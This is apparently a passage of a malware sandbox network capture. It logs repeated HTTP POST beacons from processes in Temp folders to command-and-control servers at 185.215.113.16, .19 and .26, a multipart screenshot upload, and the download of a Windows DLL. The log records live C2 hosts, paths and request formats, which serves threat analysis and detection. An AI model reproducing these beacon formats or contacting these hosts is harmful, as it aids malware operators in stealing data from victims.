Sep 3, 2024 17:14:07.191975117 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:08.077977896 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:08.139199018 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:08.431619883 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.8	49805	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:07.744623899 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000284001&unit=246122658369
Sep 3, 2024 17:14:08.738193989 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.8	49806	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:08.054013968 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:08.782190084 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:08.793823004 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:09.075753927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.8	49807	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:08.573864937 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:09.393100977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:09.448430061 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:09.716269970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.8	49808	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:08.985861063 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:09.867170095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:10.345103025 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Sep 3, 2024 17:14:10.991967916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.8	49809	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:09.245944023 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTE1ODI= Host: 185.215.113.19 Content-Length: 91734 Cache-Control: no-cache
Sep 3, 2024 17:14:09.245944023 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 45 31 4f 44 49 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTE1ODI=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:09.245944023 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:09.246052027 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:09.246052027 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:09.246052027 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:09.246107101 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:09.246107101 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:09.246107101 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:09.246107101 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:09.246184111 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:12.115226984 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.8	49810	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:09.450469971 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:10.341315031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:10.462882996 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:10.788777113 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.8	49811	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:10.542088032 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:11.454922915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:11.490391970 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:11.841610909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.8	49812	185.215.113.19	80	704	C:\Users\user\Pictures\Lighter Tech\runtime.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:10.855762005 CEST	85	OUT	GET /ProlongedPortable.dll HTTP/1.1 Host: 185.215.113.19 Connection: Keep-Alive
Sep 3, 2024 17:14:11.800422907 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:11 GMT Content-Type: application/octet-stream Content-Length: 514560 Last-Modified: Sun, 01 Sep 2024 13:24:10 GMT Connection: keep-alive ETag: "66d46afa-7da00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 4f 8e d0 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 30 00 00 d2 07 00 00 06 00 00 00 00 00 00 3e f1 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f0 07 00 4f 00 00 00 00 00 08 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELO!0> @ @@O H.textD `.rsrc@@.reloc @B HGW^YQ=(s2$(\|cFOH:<iv$:S(Ot!"Ol,^lwgdSUJJ)wIvVy^Wx'f0HgV{fUAXoOR)AT]L%cJv9}#-V%~GN'I5v;II)HqZ<+(\|M{3UatUf[
Sep 3, 2024 17:14:11.800834894 CEST	224	IN	Data Raw: 5b 66 09 d0 dc 08 06 00 00 00 00 00 00 00 00 07 00 00 00 05 05 00 00 00 08 00 00 00 05 05 00 00 00 00 00 00 01 01 00 00 00 09 00 00 00 02 02 00 00 00 0a 00 00 37 f0 f0 37 00 00 00 00 00 a4 a4 00 00 00 01 00 00 00 81 81 00 00 00 0b 0c 0d 00 00 00 Data Ascii: [f77FF..
Sep 3, 2024 17:14:11.800841093 CEST	1236	IN	Data Raw: 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 02 02 00 00 00 01 00 00 00 f6 f6 00 00 00 01 00 00 00 9f 9f 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 03 03 00 00 00 01 00 00 00 44 44 Data Ascii: DD7744
Sep 3, 2024 17:14:11.800853014 CEST	104	IN	Data Raw: 12 00 00 00 03 03 00 00 00 13 01 00 00 00 19 19 00 00 00 14 15 16 01 00 00 00 41 41 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 1a 1a 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 1a 1a 00 00 00 14 15 Data Ascii: AAss
Sep 3, 2024 17:14:11.800858021 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 11 01 00 00 00 1b 1b 00 00 00 01 00 00 00 7d 7d 00 00 00 01 00 00 00 5d 5d 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 1c 1c 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 1c 1c Data Ascii: }}]]rrRR
Sep 3, 2024 17:14:11.800863028 CEST	1236	IN	Data Raw: 00 00 00 01 00 00 00 56 56 00 00 00 01 00 00 00 12 12 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 33 33 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 33 33 00 00 00 14 15 16 01 00 00 00 ce ce 00 00 00 Data Ascii: VV3333444455__66
Sep 3, 2024 17:14:11.800868988 CEST	1236	IN	Data Raw: 48 48 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 48 48 00 00 00 14 15 16 01 00 00 00 0b 0b 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 49 49 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 49 49 Data Ascii: HHHHIIIIJJRR__KKLLLL
Sep 3, 2024 17:14:11.800879955 CEST	672	IN	Data Raw: 14 15 16 01 00 00 00 3e 3e 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 5f 5f 00 00 00 01 00 00 00 49 49 00 00 00 01 00 00 00 69 69 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 Data Ascii: >>__IIii``aazzbbbbc
Sep 3, 2024 17:14:11.801016092 CEST	1220	IN	Data Raw: 00 00 f7 f7 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 6b 6b 00 00 00 01 00 00 00 f4 f4 00 00 00 01 00 00 00 da da 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 6c 6c Data Ascii: kkll{{mmmmnnnn
Sep 3, 2024 17:14:11.801023006 CEST	1236	IN	Data Raw: 14 15 16 01 00 00 00 c5 c5 00 00 00 17 18 19 00 00 00 04 04 00 00 00 1a 00 00 00 05 05 00 00 00 05 08 dc d0 d2 90 c5 89 c8 c8 89 c5 90 d2 d0 dc 08 06 00 00 00 00 00 00 00 00 07 00 00 00 05 05 00 00 00 08 00 00 00 05 05 00 00 00 00 00 00 01 01 00 Data Ascii: 77XX
Sep 3, 2024 17:14:11.809408903 CEST	1236	IN	Data Raw: 00 72 72 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 15 15 00 00 00 1b 00 00 00 06 06 00 00 00 1c 01 00 00 00 15 15 00 00 00 14 15 16 01 00 00 00 f7 f7 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 Data Ascii: rrvv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.8	49813	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:11.190993071 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:12.131092072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:12.134983063 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:12.454190016 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.8	49814	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:11.238205910 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:12.442116976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:12.458364010 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Sep 3, 2024 17:14:13.069103956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.8	49815	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:11.991964102 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:12.977376938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
